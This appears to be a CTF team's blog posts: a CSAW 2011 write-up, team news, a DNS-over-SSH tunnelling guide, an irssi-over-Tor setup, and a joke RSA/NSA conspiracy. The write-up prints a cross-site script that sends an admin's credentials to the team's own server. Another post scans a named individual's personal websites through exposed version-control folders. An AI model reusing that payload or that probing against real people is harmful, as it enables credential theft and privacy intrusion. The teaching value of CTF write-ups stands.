Again, we had a great time at Foulab for the first edition of the Mozilla CTF. Our long time rival were there, the great beloved PPP :) …. and they manage… again… to finish just ahead of us at the last minute. Anyhow, this was great even with the unstable Spark web server but in the end, we had a blast!

Did not have time to screen shot the scoreboard! But still, a wonderful position:

Cheers!

Quick post to *show off* our 5th position @ictf2011 :P.

Good job to the Groupies who made that happened !!! It was a lot of fun. PPP… again… best us but we will fight back! :)

The solution

If you check the site’s use of AJAX, you will find an interesting url sending back the plain text password at http://csawstf.poly.edu:40004/challenge2/json/getcurrent.js. This page returns something like this :

var current = {"access":"1","username":"haxor","password":"abc123"}

The contact page showed clues that you can send an url to the webmaster that he/it will click on. The field had the “Your message or website” label and the page included warning saying “Just don’t send me anything that might get me hacked!”. Right. Let’s do just that. We sent a url and got a hit from their end couple minutes later.

128.238.66.100 - - [25/Sep/2011:20:02:15 +0400] "GET /csaw HTTP/1.1" 404 263 "-" "Mozilla/5.0 (compatible; Konqueror/4.6; Linux) KHTML/4.6.2 (like Gecko) Kubuntu"

Can we get this guy/robot to execute javascript? The answer is yes. We are lucky, the script puts the javascript object inside the window.current variable.

Our first attempt was to include the getcurrent.js with the following url http://csawstf.poly.edu:40004/challenge2/json/getcurrent.js but this failed probably because csawstf.poly.edu resolve to an internal IP address on their end and NAT translation failed from inside. The admin instead use the private IP (192.168.4.4, later gave as an hint on the mailling list) or the public IP directly. From inside, these two addresses gave the admin account password :

• http://128.238.66.100:40004/challenge2/json/getcurrent.js
• http://192.168.4.4/challenge2/json/getcurrent.js

We sent and http url to the following html file :

<html>
<head>
  <meta http-equiv="Content-type" content="text/html; charset=utf-8">
  <title>My Page</title>
  <script src="http://128.238.66.100:40004/challenge2/json/getcurrent.js"></script>
  <script src="http://our_server/payload.js"></script>
</head>
<body>
  Lots of pictures of cats...
</body>
</html>

With this Javascript :

// payload.js
var xmlhttp=new XMLHttpRequest();
if(typeof(current) != "undefined") {
  xmlhttp.open("GET","http://our_server/csaw?" + current.username + "--" + current.password + "--" + current.access, true);
}
else {
  xmlhttp.open("GET","http://our_server/csaw?missed",true);
}
xmlhttp.send();

Got us this in our log :

128.238.66.100 - - [25/Sep/2011:20:20:35 +0400] "GET /csaw?administrator--2d8a579d4d4bbd98399f47df0d6c8fd0be22e3a8--1000" HTTP/1.1" 404 263 "-" "Mozilla/5.0 (compatible; Konqueror/4.6; Linux) KHTML/4.6.2 (like Gecko) Kubuntu"

We logged in with administrator and 2d8a579d4d4bbd98399f47df0d6c8fd0be22e3a8 as the password and got the key on the main page.

Things that didn’t work

We tried sending javascript: url but it didn’t work. For example, javascript:window.location="http://our_server/a"+"b" has made a http://our_server/a"+"b hit in our log. They probably use a regex that begins with http.

For some reason, include the javascript inline the HTML didn’t work for us. But maybe we just had a syntax error.

Sending lots of picture of cats didn’t help. Animated gif was not the solution.

Saturday night and sunday morning, the queue to get our link visited was very long. Once the link was sent, it took up between 30 minutes and an hour to get a hit back. Whoever filled the queue, that wasn’t nice.

The extras

The source code was available at http://csawctf.poly.edu:40004/challenge2/dev. Here is a copy of the archive. He found this using our favourite dead file scanner, Tachyon.

The solution was to look on twitter and search for #csaw. Dino had posted a message with the SecureTips account which he controls. The #outguess hashtag was a reference to outguess.org, and after we managed to compile stegdetect, we ran the image through a dictionnary, and we had the password a while later: gobbles. Boom. We can only assume it’s a reference to this picture from blackhats.com.

This should have taken 20 minutes, but several people spent about a day and a half searching through all of Dino’s websites for the key. So to complement this small writeup, we decided to share some of the gems we found.

We ran Tachyon on his website, theta44.org. Some of the stuff on there is very interesting.

First, we have a .svn folder. Those are an amazing replacement for directory listing when it’s disabled.

<entry committed-rev="88" name="" committed-date="2008-08-17T21:06:56.987768Z" url="file:///var/svn/ddz/www/theta44.org" last-author="ddz" kind="dir" uuid="59e2e0df-2ce6-0310-a295-eeaa8d61d4f1" revision="88"/>
<entry committed-rev="18" name="defcon-2000.tar.gz" text-time="2004-12-10T19:01:50.000000Z" committed-date="2004-12-10T19:01:40.120438Z" checksum="551a6ef2afc712364ae6752fcaa06312" last-author="ddz" kind="file" prop-time="2004-12-10T19:01:49.000000Z"/>
<entry committed-rev="18" name="thttpd-ssi.txt" text-time="2004-12-10T19:01:50.000000Z" committed-date="2004-12-10T19:01:40.120438Z" checksum="8615c03c805231c208d3ef0e262596e8" last-author="ddz" kind="file" prop-time="2004-12-10T19:01:49.000000Z"/>
<entry committed-rev="70" name="old.html" text-time="2007-04-04T04:09:59.000000Z" committed-date="2007-04-03T04:01:39.132068Z" checksum="8cbc12be6f15ff46ec5a7d08ac42a76c" last-author="ddz" kind="file" prop-time="2007-04-04T04:09:59.000000Z"/>

Next we did a skipfish scan, and found a bunch more stuff. Like this statistics page under http://theta44.org/analog.html from december 2004 to september 2005. From it we learn that back in 2005 the most popular search term for Dino’s website was karma. Good for him, you never have enough of that!

Successful requests: 35,884 (511)
Average successful requests per day: 126 (72)
Successful requests for pages: 8,425 (192)
Average successful requests for pages per day: 29 (27)
Failed requests: 10,869 (315)
Redirected requests: 321 (9)
Distinct files requested: 4,296 (72)
Distinct hosts served: 3,756 (120)
Corrupt logfile lines: 11
Data transferred: 3.24 gigabytes (45.05 megabytes)
Average data transferred per day: 11.69 megabytes (6.44 megabytes)

And skipfish also found that guy’s party pictures.

I lol’d too :p

Next we moved to his blog, trailofbits.com and noticed there was a .svn folder too. Except this time we can’t access it, amazon’s server config won’t let us. Bad amazon, bad.

After some googling we also found that Dino had another nickname, once upon a time. Some of his old exploits hosted on theta44.org still mention it, like this one. And from that nickname we got to his old website, dopesquad.net, a true diamond from a time where animated GIFs were king. The fun thing with that site is the conspicious CVS folder in the web root, just like the .svn folders on the newer sites. Old habits die hard :)

That was fun!

Here’s a link to CSAW 2011 archive: http://capture.thefl.ag/2011/CSAW-quals/

After 48h of hacking, junk food, beer and Tanqueray, we ended up completing all challenges with 9500 points total being the fifth team with that score. We also had those extra points afterward:

Pretty good position (5) for the Groupies and we are quite happy! :)

CSAW 2011 - Top 6 scoreboard

Check out some pictures of the event. Write ups will be coming later on.

http://imgur.com/a/e7kQX#Zf7ec

Now, we are all warmed up for the upcoming iCTF 2011 :P

Note: Nothing in here is based on actual evidence. This is just an exercise for fun.

As I write this, everyone is getting their RSA tokens replaced. They think they are getting new ones because their old ones were compromised but what if things are not exactly as they look?

Here’s what happened: RSA was *not* keeping their seeds for the tokens. Because, after all, they didn’t need the seeds. Once the token’s seed database was delivered to their customers, they diligently deleted the seeds they had. It was the most secure thing they could do.

Sometime later, the NSA[1] knocked at their door saying: “We would like to have all the seeds for your tokens in exchange for a sh*tload of money. You see our old usual win32 0-days aren’t cutting it anymore.. With the seeds we would be in way better shape to attack the people who are a _threat_ to our nation.”

RSA replied: No but not because we don’t want to, because we can’t.. We never kept them, the most secure thing we could do for our customers was not to keep them.

Then it got into an RSA sales guy and/or C-level manager’s ear. They mandated their best technical people to it and they came up with a plan:

“Let’s do a big ‘we got owned’ fiasco story and tell all of our customers that we need to give them new tokens because the old ones aren’t safe anymore. But this time, we keep the seeds!”

NSA is happy. RSA is happy. USA is happy.

And of course, this is not what really happened.

[1] RSA, NSA only one letter difference.. ;)

• socat (http://www.dest-unreach.org/socat/)

$ sudo apt-get install socat

Screw yum and … worst! pacman :P (hw :*)

You’ll need an endpoint (server side) where your DNS queries will be rerouted. This will be the SSH tunnel endpoint. Now, how to do it:

Client Side

Start this command in the background. You can either use an init script or /etc/rc.local or whatever mechanism you like.

$ sudo socat udp-recvfrom:53,reuseaddr,bind=127.0.0.1,fork tcp:127.0.0.1:5377

So, we create an UDP socket on 127.0.0.1:53 (this is why you need root access), magically transform all traffic to TCP and sending it to 127.0.0.1:5377. This port (5377) can be whatever you want over 1024. It’s the local port of your SSH tunnel. Easy, UDP->TCP with a one liner :).

Then, start your SSH tunnel (-f -N makes SSH go to background and not execute remote command):

$ ssh -f -N -L 5377:localhost:5377 <server_addr>

Server Side

On your remote endpoint, simply redirect the TCP packet to a normal UDP datagram that will be sent to a DNS server:

$ sudo socat tcp4-listen:5377,reuseaddr,fork,backlog=50,bind=127.0.0.1 UDP:8.8.8.8:53

The example above is redirecting it to the famous Google DNS at 8.8.8.8. Feel free to use whatever DNS server you want.

The backlog=50 option is the size of listen(2) queue. Here 50. When you have thunderbird starting with 6 RSS feeds and 7 email accounts, trust me, there is a LOT of DNS queries sent through this tunnel.

Finally, change your /etc/resolv.conf. Put nameserver 127.0.0.1

Voilà!

Linux DNS query over TCP

I made a bit of research on how to make a Linux box use TCP instead of UDP for DNS resolution. The res_init() function (see resolver(5)) is part of the libc resolv component and reads the configuration file resolv.conf(5) to get default domain name, search order, name server address(es) and various options.

With the libc 2.14+, the RES_USEVC option support is added to res_init(). Just add options use-vc to the resolv.conf(5) file and TCP will be used by default for the entire system.

From there, it’s easier to reroute DNS traffic.

$ sudo ssh -f -N -L 53:8.8.8.8:53 <server_addr>

Cheers!

FIN
David

http://media.ccc.de/browse/conferences/camp2011/

Here’s a link to Dan Kaminsky’s talk. “Rien pour faire sauter une braguette, mais très divertissant”

Black Ops of TCP/IP – Dan Kaminsky

FIN

David

Tachyon is a Fast Multi-Threaded Web Discovery Tool written in python that provides:

- Plugins support
- SSL support
- Tor support (trough privoxy) (TODO)
- Robots.txt support
- Common directory lookup
- Fast Multi-Threaded execution

The Tor support is still not working but it shouldn’t take too much time before it’s added.

Feel free to contribute and add your own targets:

https://github.com/initnull/tachyon

Reference: https://trac.torproject.org/projects/tor/wiki/doc/TorifyHOWTO/IrcSilc

Install tor and run it with default configuration. Some server requires SASL authentication like Freenode. Follow these steps below to make it work:

$ sudo apt-get install libcrypt-blowfish-perl libcrypt-dh-perl libcrypt-openssl-bignum-perl torsocks
$ mkdir -p ~/.irssi/scripts/autorun
$ cd ~/.irssi/scripts/
$ wget http://freenode.net/sasl/cap_sasl.pl
$ cd autorun
$ ln -s ../cap_sasl.pl

Alright, now just run:

$ usewithtor irssi

If everything went well, you should see at the top:

Irssi: SASL: auth loaded from /home/…/.irssi/sasl.auth

Run these commands now to set up SASL authentication for freenode:

/sasl set freenode-tor <USERNAME> <PASSWORD> DH-BLOWFISH
/sasl save
/sasl load

Now add the freenode server:

/NETWORK ADD freenode-tor
/SERVER ADD -network freenode-tor -port 6667 p4fsi4ockecnea7l.onion

Minimize information leakage (recommended by the tor Website):

/IGNORE * CTCPS

Finally, save your configuration and restart irssi:

/SAVE
$ usewithtor irssi
/CONNECT freenode-tor